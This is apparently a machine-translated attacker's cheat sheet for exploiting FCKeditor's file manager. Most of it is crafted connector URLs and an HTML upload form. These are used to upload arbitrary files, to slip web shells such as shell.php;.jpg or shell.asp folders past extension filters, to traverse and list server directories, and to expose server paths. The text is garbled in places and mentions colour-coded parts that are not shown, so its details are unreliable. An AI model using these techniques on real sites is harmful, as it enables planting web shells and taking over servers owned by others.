Summary of Fckeditor vulnerability Exploitation

View Editor Version
FCKeditor/_whatsnew.html
-----------------------------

2. Version 2.2
In Apache + linux, add a breakthrough after uploading files! Test passed.
-----------------------------

3. Version <= 2.4.2 For php does not control the upload file type of Media when processing PHP uploads. As a result, users can upload arbitrary files! Save the following as an html file and modify the action address.
<Form id = "frmUpload" enctype = "multipart/form-data"
Action = "http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php? Type = Media "method =" post "> Upload a new file: <br>
<Input type = "file" name = "NewFile" size = "50"> <br>
<Input id = "btnUpload" type = "submit" value = "Upload">
</Form>
-----------------------------

4. How to bypass the "." To Change "_" underline when uploading a FCKeditor File
Most of the time, the uploaded files, such as shell.php.rar or shell.php;.jpg, will change to shell_php;.jpg, which is a change of the new FCK version.
4.1: Submit shell. php + space Bypass
However, space only supports win system * nix is not supported. [shell. php and shell. php + space are two different files not tested.
4.2: the same name file can be changed to shell.php#(1).jpg. You can also create a folder and only check the first-level directory. Skip to the second-level directory is unrestricted.
-----------------------------

5. Break through the creation of folders
FCKeditor/editor/filemanager/connectors/asp/connector. asp? Command = CreateFolder & Type = Image & CurrentFolder = % 2Fshell. asp & NewFolderName = z & uuid = 1244789975684
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector. asp? Command = CreateFolder & CurrentFolder =/& Type = Image & NewFolderName = shell. asp
-----------------------------

6. the upload address of the test file in FCKeditor
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
-----------------------------

7. Common upload addresses
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector. asp? Command = GetFoldersAndFiles & Type = Image & CurrentFolder =/
FCKeditor/editor/filemanager/browser/default/browser.html? Type = Image & connector = connectors/asp/connector. asp
FCKeditor/editor/filemanager/browser/default/browser.html? Type = Image & Connector = http://www.site.com % 2 Ffckeditor % 2 Feditor % 2 Ffilemanager % 2 Fconnectors % 2 Fphp % 2Fconnector. php (ver: 2.6.3 tested)
JSP version:
FCKeditor/editor/filemanager/browser/default/browser.html? Type = Image & Connector = connectors/jsp/connector. jsp
Note that the red part is changed to the script language used by FCKeditor, and the blue part can be customized.
The folder name can also be traversed using the ../.. directory. The Purple part is the actual website address.
-----------------------------

8. Other upload addresses
FCKeditor/_ samples/default.html
FCKeditor/_ samples/asp/sample01.asp
FCKeditor/_ samples/asp/sample02.asp
FCKeditor/_ samples/asp/sample03.asp
FCKeditor/_ samples/asp/sample04.asp
Generally, many sites have deleted the _ samples directory. You can try it.
The FCKeditor/editor/fckeditor.html file cannot be uploaded. You can click the upload image button and select Browse server to go to the file upload page.
-----------------------------

9. The column Directory Vulnerability can also help you find the upload address.
Version 2.4.1 passed the test
Modify the CurrentFolder parameter and use..././to enter different directories.
/Browser/default/connectors/aspx/connector. aspx? Command = CreateFolder & Type = Image & CurrentFolder =.../... % 2F & NewFolderName = shell. asp
You can view all the directories of the Website Based on the returned XML Information.
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector. aspx? Command = GetFoldersAndFiles & Type = Image & CurrentFolder = % 2F
You can also directly browse the drive letter:
JSP version:
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector? Command = GetFoldersAndFiles & Type = & CurrentFolder = % 2F
-----------------------------

10. Path burst Vulnerability
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector. aspx? Command = GetFoldersAndFiles & Type = File & CurrentFolder =/shell. asp
----------------------------

11. FCKeditor's passive restriction policy causes loose filtering.
Affected Version: FCKeditor x. x <= FCKeditor v2.4.3
Vulnerability description:
In FCKeditor v2.4.3, the File category rejects Upload by default:
Html | htm | php | php2 | php3 | php4 | php5 | phtml | pwml | inc | asp | aspx | ascx | jsp | cfm | cfc | pl | bat | exe | com | dll | vbs | js | reg | cgi | htaccess | asis | sh | shtml | shtm | phtm
Fckeditor 2.0 <= 2.2 $ sFilePath = $ sServerDir. $ sFileName, but $ sExtension is not used as the suffix. directly add a file after the file to be uploaded under win. to break through [not tested]!
In apache, this vulnerability can be exploited because of the Apache File name resolution vulnerability. We also recommend that you use the File category to upload files when defining the TYPE variable in other upload vulnerabilities. Based on the FCKeditor code, the limitation is the most narrow.
It is good to directly upload a script file when uploading the file, but some versions may not be directly uploaded. You can add a dot or space after the file name to bypass it, or you can create a xxx.aspfolder using the 2003 slash to upload xx.asp;.jpg!
-----------------------------

12. The oldest vulnerability is not limited to Type files!
I was exposed to the first fckeditor vulnerability. The version is unknown and should be very old, because the program does not check the type of type = xxx. We can directly construct an upload and change type = Image to Type = hsren so that we can create a folder named hsren, a new type, without any restrictions. We can upload any script!